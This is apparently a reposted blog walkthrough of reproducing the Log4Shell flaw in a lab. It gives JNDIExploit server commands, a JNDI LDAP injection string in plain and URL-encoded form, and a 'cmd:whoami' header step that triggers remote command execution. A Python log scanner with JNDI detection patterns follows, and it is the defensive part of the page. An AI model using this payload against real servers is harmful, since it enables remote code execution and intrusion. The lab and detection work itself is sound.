Use of JNDIExploit-1.2-SNAPSHOT.jar tool in log4j vulnerability reproduction

1. First, build the Log4j vulnerable test environment (range)

2. Start the service
On the Windows attacker machine, run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

Open another cmd window to list the payloads that can be used:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

Any of the payloads listed above can be tried. This walkthrough uses
ldap://null:1389/TomcatBypass/TomcatEcho
3. Construct the request
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
and URL-encode it:
%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4. Add the header cmd:whoami to the request packet in Burp Suite (bp)

After the request is sent, the command is found to have executed.
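A defender-side check for the request built in step 3, as an added example that is not part of the original post: it scans web access log lines for the JNDI lookup in the literal and percent-encoded forms shown above (including double encoding) and extracts the callback address and path for triage. The function names and the sample log lines are constructed for illustration; only the lookup string comes from this page.

```python
import re
from urllib.parse import unquote

# Matches a JNDI lookup and captures scheme, host:port and path.
JNDI_RE = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns)://([^/\s}]+)(/[^\s}]*)?\}", re.IGNORECASE
)

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(line):
    """Return (scheme, authority, path) for each JNDI lookup in one log line."""
    text = decode_fully(line)
    return [(m.group(1).lower(), m.group(2), m.group(3) or "")
            for m in JNDI_RE.finditer(text)]

def scan(lines):
    """Scan log lines; return one record per lookup with its 1-based line number."""
    hits = []
    for number, line in enumerate(lines, 1):
        for scheme, authority, path in find_jndi_lookups(line):
            hits.append({"line": number, "scheme": scheme,
                         "authority": authority, "path": path})
    return hits

# Constructed sample access log lines (not captured traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /hello?payload=%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D HTTP/1.1" 200 31',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html?q=log4j%20docs HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}"',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /hello?payload=%2524%257Bjndi%253Aldap%253A//192.168.155.2%253A8888/TomcatBypass/TomcatEcho%257D HTTP/1.1" 200 31',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit means the lookup string reached the server, not that it was evaluated; correlate with outbound connections from the application host to the extracted address.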

Origin blog.csdn.net/wutiangui/article/details/132733709